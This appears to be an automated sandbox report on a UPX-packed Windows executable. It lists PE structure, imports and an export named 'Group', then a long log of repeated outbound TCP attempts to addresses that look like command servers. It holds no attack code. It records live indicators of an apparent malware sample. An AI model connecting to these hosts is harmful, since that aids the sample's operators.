                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Rich Headers

                                    Programming Language:
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ C ] VS98 (6.0) build 8168
                                    • [C++] VS98 (6.0) build 8168
                                    • [RES] VS98 (6.0) cvtres build 1720
                                    • [LNK] VS98 (6.0) imp/exp build 8168

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x366a80x3c.rsrc
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x363f80x2b0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x350000x13f8.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x366e40xc.rsrc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    UPX00x10000x1d0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    UPX10x1e0000x170000x16800cb1026f8f75c78cc70a618d3d8d74f16False0.9822157118055556data7.919300310478591IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x350000x20000x180079e4d91889da7eba4072fabd611a7062False0.2890625data4.305579106560728IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    fdss0x370000x2080x200da18cbcff70aaec6311fc739f52e246cFalse0.115234375data0.703199634755278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_BITMAP0x351d40x528Device independent bitmap graphic, 14 x 16 x 8, image size 256, resolution 2835 x 2835 px/mEnglishUnited States0.1
                                    RT_BITMAP0x357000x528Device independent bitmap graphic, 14 x 16 x 8, image size 256, resolution 2835 x 2835 px/mEnglishUnited States0.08409090909090909
                                    RT_BITMAP0x35c2c0x50Device independent bitmap graphic, 8 x 8 x 1, image size 32EnglishUnited States0.4125
                                    RT_BITMAP0x35c800x50Device independent bitmap graphic, 8 x 8 x 1, image size 32EnglishUnited States0.4875
                                    RT_HTML0x35cd40x49HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8493150684931506
                                    RT_HTML0x35d240xdHTML document, ASCII text, with no line terminatorsEnglishUnited States1.3076923076923077
                                    RT_HTML0x35d380x6beHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5179606025492468

                                    Imports

                                    DLLImport
                                    KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree
                                    ADVAPI32.dllRegOpenKeyA
                                    MFC42.DLL
                                    MSVCP60.dll??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
                                    MSVCRT.dllfree
                                    NETAPI32.dllNetbios
                                    ole32.dllCoUninitialize
                                    OLEAUT32.dllSysStringLen
                                    SHLWAPI.dllStrStrIA
                                    USER32.dllwsprintfA
                                    WS2_32.dllhtons

                                    Exports

                                    NameOrdinalAddress
                                    Group10x1000bb70

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 19, 2024 14:23:08.957200050 CET4970716300192.168.2.10107.163.241.185
                                    Nov 19, 2024 14:23:09.966401100 CET4970716300192.168.2.10107.163.241.185
                                    Nov 19, 2024 14:23:11.966533899 CET4970716300192.168.2.10107.163.241.185
                                    Nov 19, 2024 14:23:15.966486931 CET4970716300192.168.2.10107.163.241.185
                                    Nov 19, 2024 14:23:23.966353893 CET4970716300192.168.2.10107.163.241.185
                                    Nov 19, 2024 14:23:30.998902082 CET497146520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:23:32.013276100 CET497146520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:23:34.006580114 CET4971512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:34.006978035 CET4971612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:34.013407946 CET497146520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:23:35.013273954 CET4971512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:35.013276100 CET4971612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:37.013442039 CET4971512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:37.014686108 CET4971612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:37.285955906 CET4971780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:38.013365030 CET497146520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:23:38.154891968 CET4971812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:38.268796921 CET4971912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:38.331680059 CET4972080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:39.169543028 CET4971812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:39.372653008 CET4971912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:39.372862101 CET4972080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:41.169550896 CET4971812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:41.372699976 CET4971912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:41.372700930 CET4972080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:42.155886889 CET4972112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:42.327006102 CET4972212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:42.342318058 CET4972380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:43.263325930 CET4972112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:43.357085943 CET4972380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:43.372678041 CET4972212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:45.372658014 CET4972380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:45.372704029 CET4972112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:45.372740984 CET4972212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:46.060179949 CET497146520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:23:46.174069881 CET4972912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:46.284956932 CET4973080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:46.285339117 CET4973112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:47.278950930 CET4973080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:47.370641947 CET4972912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:47.370731115 CET4973112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:49.294560909 CET4973080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:49.466442108 CET4972912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:49.466748953 CET4973112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:50.213088989 CET4973312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:50.420217991 CET4973412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:50.435606003 CET4973580192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:51.372833014 CET4973312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:51.435192108 CET4973580192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:51.575663090 CET4973412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:52.281212091 CET497366520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:23:53.372790098 CET4973312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:53.372797966 CET497366520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:23:53.482116938 CET4973580192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:53.669656038 CET4973412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:54.217175961 CET4973712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:54.334358931 CET4973812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:54.656538010 CET4973980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:55.216520071 CET4973712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:55.341499090 CET4973812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:55.388391018 CET497366520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:23:55.653992891 CET4973980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:57.216496944 CET4973712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:57.342683077 CET4973812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:57.669692039 CET4973980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:58.233233929 CET4974012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:58.348911047 CET4974112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:58.351689100 CET4974280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:59.247757912 CET4974012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:59.341526031 CET4974112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:23:59.357135057 CET4974280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:23:59.388401985 CET497366520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:01.250782013 CET4974012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:01.341530085 CET4974112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:01.372750998 CET4974280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:02.248543978 CET4974312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:02.361884117 CET4974412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:02.362907887 CET4974580192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:03.250777960 CET4974312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:03.372828960 CET4974580192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:03.372876883 CET4974412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:05.247852087 CET4974312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:05.372807026 CET4974412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:05.372869968 CET4974580192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:06.290110111 CET4974612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:06.882675886 CET4974712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:06.886926889 CET4974880192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:07.294680119 CET4974612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:07.388384104 CET497366520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:07.888421059 CET4974880192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:07.888422012 CET4974712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:09.294720888 CET4974612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:09.888407946 CET4974712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:09.888492107 CET4974880192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:10.295761108 CET4975012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:10.431253910 CET4975112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:10.433980942 CET4975280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:11.310305119 CET4975012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:11.435338974 CET4975112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:11.435523987 CET4975280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:13.310282946 CET4975012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:13.435307026 CET4975112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:13.437458992 CET4975280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:13.499169111 CET497536520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:14.311327934 CET4975412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:14.513420105 CET497536520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:14.545057058 CET4975512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:14.579710960 CET4975680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:15.325906992 CET4975412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:15.560389996 CET4975512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:15.591620922 CET4975680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:16.513425112 CET497536520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:17.341630936 CET4975412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:17.560376883 CET4975512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:17.591751099 CET4975680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:18.353575945 CET4975712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:18.470721006 CET4975812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:18.524342060 CET4975980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:19.357167006 CET4975712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:19.482163906 CET4975812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:19.544698000 CET4975980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:20.654093027 CET497536520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:21.357219934 CET4975712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:21.482171059 CET4975812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:21.565722942 CET4975980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:22.358028889 CET4976012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:22.560842037 CET4976112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:22.561245918 CET4976280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:23.357233047 CET4976012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:23.560363054 CET4976112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:23.619606018 CET4976280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:25.357341051 CET4976012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:25.576013088 CET4976112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:25.638609886 CET4976280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:26.358103037 CET4976312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:26.473026991 CET4976412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:26.473716974 CET4976580192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:27.372816086 CET4976312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:27.482403040 CET4976412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:27.638541937 CET4976580192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:28.747883081 CET497536520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:29.388641119 CET4976312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:29.497852087 CET4976412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:29.747889996 CET4976580192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:30.373573065 CET4976712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:31.055069923 CET4976812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:31.055732965 CET4976980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:31.373150110 CET4976712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:32.060437918 CET4976980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:32.138575077 CET4976812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:33.388520956 CET4976712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:34.060465097 CET4976980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:34.138485909 CET4976812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:34.374361992 CET4977012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:34.487642050 CET4977112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:34.488637924 CET4977280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:34.878078938 CET497736520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:35.372873068 CET4977012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:35.497899055 CET4977112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:35.497900009 CET4977280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:35.888485909 CET497736520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:37.388582945 CET4977012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:37.497929096 CET4977280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:37.513539076 CET4977112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:37.888644934 CET497736520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:38.389497995 CET4977412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:38.665736914 CET4977580192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:38.665951014 CET4977612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:39.404112101 CET4977412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:39.669806004 CET4977580192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:39.673082113 CET4977612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:41.419861078 CET4977412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:41.685420990 CET4977580192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:41.689074039 CET4977612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:41.888539076 CET497736520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:42.405764103 CET4977712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:42.517746925 CET4977812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:42.519460917 CET4977980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:43.419748068 CET4977712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:43.529154062 CET4977980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:43.529162884 CET4977812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:45.419815063 CET4977712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:45.544925928 CET4977980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:45.544935942 CET4977812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:46.422786951 CET4978012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:46.873986006 CET4978180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:46.874166012 CET4978212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:47.419845104 CET4978012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:47.888660908 CET4978212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:47.888664961 CET4978180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:49.435436010 CET4978012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:49.888577938 CET4978180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:49.888683081 CET4978212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:49.888686895 CET497736520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:50.437005043 CET4978312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:50.580527067 CET4978480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:50.581937075 CET4978512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:51.451159000 CET4978312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:51.576056004 CET4978480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:51.591686964 CET4978512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:53.466671944 CET4978312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:53.591718912 CET4978480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:53.591722012 CET4978512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:54.499115944 CET4978712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:54.973107100 CET4978812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:55.358501911 CET4978980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:55.513581038 CET4978712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:55.966790915 CET4978812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:56.001343966 CET497906520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:56.373224974 CET4978980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:57.013595104 CET497906520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:57.513740063 CET4978712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:57.966811895 CET4978812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:58.374989986 CET4978980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:58.514921904 CET4979112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:58.688690901 CET4979280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:24:58.689388037 CET4979312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:59.013598919 CET497906520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:24:59.529202938 CET4979112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:59.685534954 CET4979312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:24:59.701097012 CET4979280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:01.544879913 CET4979112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:01.685458899 CET4979312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:01.716754913 CET4979280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:02.518407106 CET4979412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:02.764303923 CET4979512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:02.764791965 CET4979680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:03.013828993 CET497906520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:03.513659954 CET4979412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:03.779249907 CET4979680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:03.779309988 CET4979512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:05.623038054 CET4979412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:05.779218912 CET4979680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:05.826102972 CET4979512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:06.529954910 CET4979712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:06.646595001 CET4979812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:06.647576094 CET4979980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:07.623004913 CET4979712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:07.810517073 CET4979980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:07.826126099 CET4979812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:09.622970104 CET4979712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:09.810532093 CET4979980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:09.919898033 CET4979812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:10.545696974 CET4980012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:10.819297075 CET4980180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:10.819554090 CET4980212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:11.013605118 CET497906520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:11.701167107 CET4980012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:11.826121092 CET4980180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:12.013644934 CET4980212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:13.701122999 CET4980012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:13.826121092 CET4980180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:14.013669968 CET4980212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:14.681323051 CET4980380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:14.681533098 CET4980412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:14.681857109 CET4980512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:15.701123953 CET4980412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:15.701220036 CET4980512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:15.827027082 CET4980380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:17.128073931 CET498066520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:17.734255075 CET4980412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:17.734306097 CET4980512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:17.826143980 CET4980380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:18.326220989 CET498066520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:18.709216118 CET4980712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:18.815663099 CET4980812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:18.816824913 CET4980980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:19.810564041 CET4980712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:19.810909033 CET4980980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:19.826169968 CET4980812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:20.326165915 CET498066520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:21.810544968 CET4980712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:21.810584068 CET4980980192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:21.826164961 CET4980812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:22.719654083 CET4981112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:22.943854094 CET4981212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:22.945964098 CET4981380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:23.826306105 CET4981112354192.168.2.10107.163.241.186
